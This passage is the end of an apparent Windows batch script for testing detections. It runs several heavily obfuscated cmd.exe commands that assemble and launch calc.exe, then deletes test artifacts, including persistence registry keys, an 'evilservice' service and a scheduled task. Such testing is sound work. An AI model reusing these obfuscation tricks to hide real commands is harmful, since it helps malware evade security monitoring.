;   ,  ,   %^c   ,   ;   ;    ,    ,  ;   ;   in   ,  ,   ,   ,   ;  (^ ^ ^ ^ ^  +^7^9 ^ ^  ^  ;^ ^ ^ ^  ^ ^ ^;^  ^ ^;^ ^ ^  ^ ^-1^0 ^ ^ ^  ^ ^,^ ^ ^  ^ ^ ^ ^,^ ^ ^ ^ ^ ^ ,^ ^ ^ ^+9 ^  ^ ^ ^;^ ^ ^ ^  ;^ ^ ^   ^ ^ ^;^ ^ ^  ^ ^ ; ^ ^ ^  ^ ^;^ ^ ^ ^ ^;^ ^ ^ ^ ^  )   ,  ;  ;  ,  ;  ^d^O  ,  ,   ,    ;   ,  ,   ;  (       ;    ;    ;      ;       ;     ;    ;     (      ;   ;    ;   (    ;     ;       ;   ;     (     ,       ,    ,      (      (  ,   ;   ;    ;   s^e^T        ^;^ ^ ^ =!^;^ ^ ^ !!^\^  :~   %^c,   1!)     ,       ,   )    ,    )       ;       ;    ;   ;      ;      )      ;       ;     ;       ;    ;     )       )&&   ,   ,    ;  ;  ,   ;   ,  ^i^f  ;  ;   ;   %^c  ,   ;  ,   ,   ;   ;      ;  ;   ;   ^E^qU   ,  ;   ;    ;   ;  ;  ,   ^9    ,   ;   ,   ,    ,   ;  (     ,    ,    ,      ,     ,     (    ,    ,      ,     ,      ,       ,      ,   (       ,   ,      ,      ,   ,   (^c^a^L^l   ,  ;   ,   ,  %^;^ ^ ^ :^~^  ^ ^ ^ ^ ^ ^+^6%       )      ;    ;     ;     ;   ;   ;      ;   )       ,      ,     ,    )    ,   ,   )       "
1013 | echo Execution Finished at %time% %date%
1014 | timeout 5
1015 | 
1016 | echo %time% %date% [+] Testing PAYLOAD\FORCODE\1 exec
1017 | start "" cmd /V:ON/C"set Wyv=elax.c&&for %s in (5;2;1;5;4;0;3;0;10)do set Tgy0=!Tgy0!!Wyv:~%s,1!&&if %s equ 10 call %Tgy0:~-8%"
1018 | echo Execution Finished at %time% %date%
1019 | timeout 5
1020 | 
1021 | echo %time% %date% [+] Testing PAYLOAD\FORCODE\2 exec
1022 | ^cm^d,  , ^/^v^: ,  /^r "  , , ( ,  (^S^ET ^ H^4^vN=cx^e^.^l^a) )&   , ^f^o^R, , %^d, ,^in,(^ ^  ,+0^ ^+5 ^, ,^ 4 -^0 3^ +2 ^, ^, 1 ^+^2 ^+1^2^ ) , ^d^o (,   ,  , ,,(S^E^t    ^9O^w=!^9O^w!!H^4^vN:~  %^d,   1!)   , ,,   ,,)&&  ,  , ^I^f  ,  %^d , , ^Eq^U , , +^1^2  ,  , (C^A^L^l, %^9O^w:~^   ^-^8%)"
1023 | echo Execution Finished at %time% %date%
1024 | timeout 5
1025 | 
1026 | echo %time% %date% [+] Testing PAYLOAD\FORCODE\3 exec
1027 | ^f^o^r  ;  ,  , /^f ;  ; "    delims=Otfy2   tokens=   +1    "  ,  , ,  %N  ;  ;  ;  ^iN  ,  ;  ;  (  ;  ,  '  ,  ,  ;  ^^F^^tY^^P^^e  ,  ; ^|  , ,  ^^F^^in^^D  ,  ,  "dfi"  ,  ; ;  '  ,  ,  , ) , ,  ^d^o  , ;  %N;   , , 4^/^vdF^un^_^y^E^6^b^$^ ^   , ,  ;  VkZXNtHo/^R    "  ; ,  ;  (    ,  ;    ,    ;    ,  ;    ,   (^s^ET ^ ^ ^_^ ^ ^ =^e^.^l^a^c^x) )&&      ,  ,  ^F^o^R  ;  ,  , %^E  ,  ; ,  ^In  ,  ;  (^ ^ ^ ^ ^,^4^ ^;^ ^;^ ^+^3^ ^,^ +^2^ ^;^ ^;^ ^;^ ^+^4 ^,^ ^1^ ;^ ; ^;^ ^+^0^ +5 ^;^ ^;^ ^; ^0 ^,^ ^1^5^ ,^ ^ ^ ^ ) ; ,  ^d^O (   ,  ,  ,  (  ,   ;    ,    ;   ,  ;    ,    (s^E^t     ^~^ ^ ^ =!^~^ ^ ^ !!^_^ ^ ^ :~   %^E,    1!)  ,   )  ,    )&  ,  ; ^i^F ;  ,  %^E ; ; ^e^qU  ; , ,  ^1^5  , ,  ( ( , (^C^A^l^L ,  ,  , %^~^ ^ ^ :^~^ ^ ^  ^+^6%) , ) )   "
1028 | echo Execution Finished at %time% %date%
1029 | timeout 5
1030 | 
1031 | echo %time% %date% [+] Testing PAYLOAD\FINCODE\1 exec
1032 | start "" cmd.exe /V:ON/C"set NZ=cajc.efe&&set uUP=!NZ:j=l!&&set sj=!uUP:f=x!&&call %sj%"
1033 | echo Execution Finished at %time% %date%
1034 | timeout 5
1035 | 
1036 | echo %time% %date% [+] Testing PAYLOAD\FINCODE\2 exec
1037 | start "" %comMOnpROgrAMW6432:~  -12,1%%COmmOnprOgRAMw6432:~ +9, 1%%sysTEMrOot:~  6,   +1%;   ; ^/^v:^o    ;/^R   ";  ;( ; ;   (^s^ET Rm^L=Na^MN^0eu^e)  )&   (   (se^t O^Dr=^!^RmL:N=^c^!) ; )&   (^SE^t ^ ^rz=^!^O^Dr^:M^=^l^!)& ( ; (s^et  ^ o^Qr=!^r^z^:^u^=^x!)   )&   (S^et ^ ^  ^9RJ=^!o^Qr^:0=^.^!)& ;( (^c^a^Ll  ; ; %^9RJ%) )  "
1038 | echo Execution Finished at %time% %date%
1039 | timeout 5
1040 | 
1041 | echo %time% %date% [+] Testing PAYLOAD\FINCODE\3 exec
1042 | ^F^O^R  ; ,  , ;   /^F  ;   ,   ;  ,  "  tokens=  +1     delims==N6.W"   ,   , ;  ,  ;   %^S  ;  ; ,   ;  ,   ^in  ;   ,   ;  ;  (  ,  ;   , , ,   '  ;  ,   ; ,   ;   ^^a^^s^^s^^O^^c  ;  ;  ^| ,  , ,  ;  ;  ^^FIn^^D^^s^^T^^R  , ,  ; ,   ^^m^^d^^f   ' ,  ,  )  ;   ;  ;  ;  ;   ^d^O   ,   ,   ,  ,  ;  %^S;    ,  ; ;  OEkpQH8uR^/^V^G^e^c^w^A^M^ ^ ^    ;  ,  ;   ;  LZQGHDTY/^R  "  ;   ,   ; ,  (     ,     ;  ,     ;  ,     (  ,    (     ,    (     ,    (^S^e^T^ ^ ^ ^ ^ ^?^ ^  ^ ^=^c^)^'^c^:.^-^.)    ;  ;   ;  ;     )  ;   ;     ;   )   ,  )  ,  )&     (     ;   ;  ;  (  ,   ,   (  ,     (^S^e^t ^ ^ ^ ^{^ ^ =!^?^ ^ ^ ^ ^:^-^=^x^!)  ;   ;   ;     )  ;  ;  ;    )  ,     )&  (  ,     ;    ,   ;  ,    (    ,     (     ,    (   ,     ;  ,  ;     ,    ;     ,   ;     ,     (^S^E^T ^ ^ ^ ^$^ ^ =^!^{^ ^ ^:^.^=e^!)    )    )   ,   )    ;  ;   ;  ;  )&&   (  ,     ,  ,    (^s^E^t ^ ^ ^;^ ^ ^ =^!^$^ ^ ^:^)^=^a^!) ; ; ; )&&     (    (     ;    ;    ;   (  ,     (^s^E^T ^ ^ ^- ^ ^ =^!^;^ ^ ^ ^::^=^.^!)     )  ,    )    ;     ;  ;  ;  )&&     (   ,     (   ;     ;    ;   ;    ;   (    ,    (   ,  (^s^E^t ^ ^ ^ ^ ^]^ ^  ^ =^!^-^ ^ ^ :^'=^l^!) , , ) ; ; ; ; ; ) , , ) )& ,  ,  (    ,     (     ,    (^c^A^l^L ;   ;   ; ;   %^]^ ^  ^ %)  ,   ;   ,   ;   ,   ;   ,   ;   ,    ;  ,     )  ,    ;  ,  ;  ,    ;   ,  ;     ,   )     "
1043 | echo Execution Finished at %time% %date%
1044 | timeout 5
1045 | 
1046 | 
1047 | echo [+] Let tasks finish before deleting all the files
1048 | 
1049 | timeout 60
1050 | 
1051 | echo [+] Cleanup
1052 | 
1053 | start "" cmd /c del xxxFile.csproj
1054 | start "" cmd /c del AllTheThings.dll
1055 | start "" cmd /c del fi.b64
1056 | start "" cmd /c del calc.ps1
1057 | start "" cmd /c del diskshadow.txt 
1058 | start "" cmd /c del adrestore.exe
1059 | start "" cmd /c del Default_File_Path.ps1
1060 | start "" cmd /c del trace.etl
1061 | start "" cmd /c del adrestore.exe
1062 | start "" cmd /c del adrestore2.exe
1063 | start "" cmd /c del trace.etl
1064 | start "" cmd /c del trace.cab
1065 | start "" cmd /c del calc.inf
1066 | start "" cmd /c del %windir%\System32\mscfgtlc.xml
1067 | start "" cmd /c del 12.txt
1068 | start "" cmd /c del payload.cs
1069 | start "" cmd /c del calc2.inf 
1070 | start "" cmd /c del payload.exe
1071 | start "" cmd /c del testADS.txt
1072 | start "" cmd /c del C:\windows\temp\url.url
1073 | start "" cmd /c del Default_File_Path2.ps1
1074 | start "" cmd /c del notepad.msi
1075 | start "" cmd /c del shim.64
1076 | start "" cmd /c del calc2.sdb
1077 | start "" cmd /c del calc.sdb
1078 | start "" cmd /c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /f
1079 | start "" cmd /c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /f
1080 | start "" cmd /c sc delete evilservice
1081 | start "" cmd /c schtasks /delete /tn mysc /f
1082 | start "" cmd /c reg delete "HKCU\Software\Microsoft\Command Processor" /v AutoRun /f 
1083 | taskkill /F /IM pass_TestBin.exe
1084 | start "" cmd /c del pass.b64
1085 | start "" cmd /c del pass_TestBin.exe
1086 | start "" cmd /c del Test.SettingContent-ms
1087 | 
1088 | echo "[+] Killing leftover binaries
1089 | 
1090 | REM kill any left over processes
1091 | taskkill /F /IM calc.exe
1092 | taskkill /F /IM hh.exe
1093 | taskkill /F /IM cmd.exe 


--------------------------------------------------------------------------------